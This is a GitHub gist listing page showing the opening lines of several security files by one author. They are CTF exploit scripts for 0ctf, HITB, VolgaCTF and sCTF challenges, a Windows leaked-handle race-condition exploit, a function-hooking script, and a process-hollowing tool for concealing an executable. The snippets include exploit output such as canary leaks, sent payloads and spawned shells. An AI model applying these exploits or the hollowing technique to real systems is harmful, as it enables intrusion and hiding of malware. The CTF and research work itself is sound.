crazy hugsy hugsy
hugsy
/ gist:8e31ddc61dba7d4e7c1f
Created
March 14, 2016 02:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # Exploit for warmup-100 (0ctf) | |
| # Done after the competition. | |
| # | |
| # @_hugsy_ | |
| # | |
| import socket, struct, sys, telnetlib, binascii, time |
hugsy
/ gist:06ff00997c9d07099f27
Created
March 23, 2016 03:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # bakery@ip-172-31-31-97:/home/bakery$ cat YOU_WANT_THIS_ONE | |
| # cat YOU_WANT_THIS_ONE | |
| # You win! The flag is HITB{24d467d954cc08efbfa6acd8341e55d7} | |
| # | |
| # @_hugsy_ | |
| # | |
| import socket, struct, sys, telnetlib, binascii |
hugsy
/ gist:d1fbc225c05b9191c951
Last active
October 3, 2016 14:37
VolgaCTF 2016 - TicTacToe (PPC 200)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # VolgaCTF 2016 - TicTacToe (PPC 200) | |
| # | |
| # @_hugsy_ | |
| # $ ./tic-tac-toe.py | |
| # [...] | |
| # Blocking computer in 5 with X | |
| # Declaring draw for round=500 | |
| # Starting new round 500 |
hugsy
/ gist:7777e8480d1759a07db4
Last active
October 3, 2016 14:37
VolgaCTF 2016 - Web of Science 2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| import socket, struct, sys, telnetlib, binascii | |
| HOST = "webofscience2.2016.volgactf.ru" | |
| # HOST = "172.28.128.3" | |
| PORT = 45679 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # ~/ctf/volgactf_2016 $ ./gef-exploit.py | |
| # [+] Connected to webofscience.2016.volgactf.ru:45678 | |
| # [+] Passing checks | |
| # [+] Adding a paper | |
| # [+] Adding paper name | |
| # [+] Adding paper abstract | |
| # [+] Showing paper to leak the canary | |
| # [+] Got addr: 0x7fffffffe6e0 |
hugsy
/ hook_dump_files.py
Created
April 11, 2016 07:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # easy function hooking in process | |
| # | |
| from winappdbg import Process, Debug, EventHandler | |
| import sys | |
| PAGE_EXECUTE = 0x10 | |
| PAGE_EXECUTE_READ = 0x20 | |
| PAGE_EXECUTE_READWRITE = 0x40 | |
| PAGE_EXECUTE_WRITECOPY = 0x80 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # | |
| # hugsy:~/downloads/_pwn2 $ ./gef-exploit.py (13:23) | |
| # [+] Connected to problems2.2016q1.sctf.io:1338 | |
| # Attach with GDB and hit Enter | |
| # [+] Crafting payload | |
| # [+] Sent 256 bytes | |
| # [+] Got it, interacting (Ctrl-C to break) | |
| # [+] Get a PTY with ' python -c "import pty;pty.spawn('/bin/bash')" ' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # [+] Connected to problems2.2016q1.sctf.io:1339 | |
| # Attach with GDB and hit Enter | |
| # [+] Filling up threads | |
| # [+] threads[0].next=0xbfd78e3d | |
| # [+] all_threads=0xbfd78dec | |
| # [+] new_thread=0xbfd81aec | |
| # [+] canary_addr=0xbfd81f54 | |
| # [+] retaddr=0xbfd81f5c | |
| # [+] set_last_chunk_next_address(0xbfd81ee0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Curated exploit of @tirranido leaked handle race condition | |
| * | |
| * Tested on | |
| * - Win7 x64 | |
| * - Win8.1 x64 | |
| * - Win10 x64 | |
| * | |
| * Ref: https://googleprojectzero.blogspot.com.au/2016/03/exploiting-leaked-thread-handle.html | |
| * @_hugsy_ |
hugsy
/ ProcessHollower.c
Created
April 25, 2016 11:00
ProcessHollower: Hide a executable inside the runtime of another one
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * | |
| * ProcessHollower: Hide a executable inside the runtime of another one | |
| * | |
| * Compile with | |
| * C:> cl.exe ProcessHollower.c | |
| * | |
| * Execute with: | |
| * C:> ProcessHollower.exe notepad.exe myevilbinary.exe | |
| * |